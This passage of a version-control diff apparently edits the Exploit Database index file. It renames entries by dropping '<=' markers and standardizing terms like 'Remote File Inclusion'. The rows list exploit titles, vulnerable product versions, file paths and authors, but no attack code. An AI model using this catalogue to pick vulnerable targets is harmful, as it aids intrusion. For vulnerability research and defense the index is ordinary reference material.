Inclusion",2009-09-17,"EA Ngel",php,webapps,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation",2009-09-17,Rick,linux,local,0 -9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) Remote SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 +9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injection Vulnerabilities",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Auth Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla Component com_jreservation 1.5 - (pid) Blind SQL Injection Exploit",2009-09-17,"Chip d3 bi0s",php,webapps,0 9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 -9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - Remote SQL Injection",2009-09-18,snakespc,multiple,webapps,0 -9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Include",2009-09-18,"EA Ngel",multiple,webapps,0 -9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server <= 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 +9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0 +9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 +9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - XSS / Directory Traversal",2009-09-18,Stack,multiple,remote,0 9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 show-cat.php SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusion Vulnerabilities",2009-09-18,NoGe,multiple,webapps,0 @@ -9181,20 +9181,20 @@ id,file,description,date,author,platform,type,port 9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-21,HxH,multiple,webapps,0 9723,platforms/multiple/webapps/9723.txt,"Joomla com_jbudgetsmagic 0.3.2 < 0.4.0 - SQL Injection(bid)",2009-09-21,kaMtiEz,multiple,webapps,0 9724,platforms/multiple/webapps/9724.txt,"BAnner ROtation System mini Multiple Remote File Inclusion",2009-09-21,"EA Ngel",multiple,webapps,0 -9726,platforms/multiple/webapps/9726.py,"cP Creator 2.7.1 - Remote SQL Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 +9726,platforms/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",multiple,webapps,0 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 -9728,platforms/multiple/webapps/9728.txt,"ProdLer <= 2.0 - Remote File Include",2009-09-21,"cr4wl3r ",multiple,webapps,0 -9729,platforms/multiple/webapps/9729.txt,"Loggix Project <= 9.4.5 - Multiple Remote File Include",2009-09-21,"cr4wl3r ",multiple,webapps,0 -9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQLi / persistent XSS",2009-09-21,learn3r,multiple,webapps,0 +9728,platforms/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 +9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 +9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQLi / Persistent XSS",2009-09-21,learn3r,multiple,webapps,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 +9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 -9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 +9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 -9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 +9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0 @@ -9234,14 +9234,14 @@ id,file,description,date,author,platform,type,port 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0 -9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 -9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 +9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 +9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - (.m3u) Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 -9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 +9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - XSS",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hardcoded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 @@ -9249,13 +9249,13 @@ id,file,description,date,author,platform,type,port 9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 -9863,platforms/php/webapps/9863.txt,"Achievo <= 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 +9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0 -9867,platforms/php/webapps/9867.txt,"Amiro.CMS <= 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file DoS",2009-10-27,Dr_IDE,windows,dos,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 -9873,platforms/windows/webapps/9873.txt,"Cherokee <= 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 +9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - DoS",2009-10-26,"Usman Saeed",windows,dos,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 @@ -9265,7 +9265,7 @@ id,file,description,date,author,platform,type,port 9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q PoC BoF",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 -9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 +9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - XSS & Information Disclosure & Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 @@ -9279,35 +9279,35 @@ id,file,description,date,author,platform,type,port 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow Exploit",2009-10-19,iM4n,windows,remote,80 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 -9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 +9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS & SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 -9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 -9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 +9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 +9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0 -9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 -9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 +9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25 +9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783 9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0 9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23 9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23 9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)",2008-10-14,"Adriano Lima",solaris,remote,111 -9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 +9921,platforms/solaris/remote/9921.rb,"Solaris 8.0 - LPD Command Execution (Metasploit)",2001-08-31,"H D Moore",solaris,remote,515 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit)",2003-04-07,"H D Moore",osx,remote,139 9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Remote File Upload/Execute",2009-07-22,spinbad,php,webapps,0 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit)",2009-10-28,anonymous,osx,remote,0 -9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) (Metasploit)",2004-07-13,ddz,osx,remote,21 +9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 - USER Overflow (OS X) (Metasploit)",2004-07-13,ddz,osx,remote,21 9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit)",2006-03-01,"H D Moore",osx,remote,25 -9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 +9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client 5.3.3 - Type 77 Overflow (OS X) (Metasploit)",2005-02-18,"H D Moore",osx,remote,0 9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)",2004-03-03,"H D Moore",osx,remote,548 9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 @@ -9321,37 +9321,37 @@ id,file,description,date,author,platform,type,port 9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)",2001-02-28,"H D Moore",multiple,remote,5555 9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access (Metasploit)",2007-04-23,"H D Moore",multiple,remote,0 9944,platforms/multiple/remote/9944.rb,"Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)",2008-10-23,egypt,multiple,remote,0 -9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite (Metasploit)",2007-03-05,egypt,multiple,remote,0 +9945,platforms/multiple/remote/9945.rb,"Opera 9.10 Configuration Overwrite (Metasploit)",2007-03-05,egypt,multiple,remote,0 9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)",2006-07-25,"H D Moore",multiple,remote,0 9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0 -9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0 +9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0 9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0 9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 -9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 +9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 -9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 - XSS and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 +9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - XSS and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS",2011-01-17,Penguin,php,webapps,0 -9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0 +9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 -9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 +9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 -9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 +9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities",2009-11-16,"Alexey Sintsov",hardware,webapps,80 -9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <= 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 +9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/dos/9980.txt,"Websense Email Security - DoS",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 @@ -9367,11 +9367,11 @@ id,file,description,date,author,platform,type,port 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 -9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Include",2009-11-12,mozi,php,webapps,0 +9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Inclusion",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 -10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway <= 6.0 Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 +10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL-Injection Vulnerabilities",2009-10-09,"Andrea Fabrizi",php,webapps,0 @@ -9385,30 +9385,30 @@ id,file,description,date,author,platform,type,port 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 -10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 -10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 +10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 +10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10022,platforms/linux/dos/10022.c,"Linux Kernel <= 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 +10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow 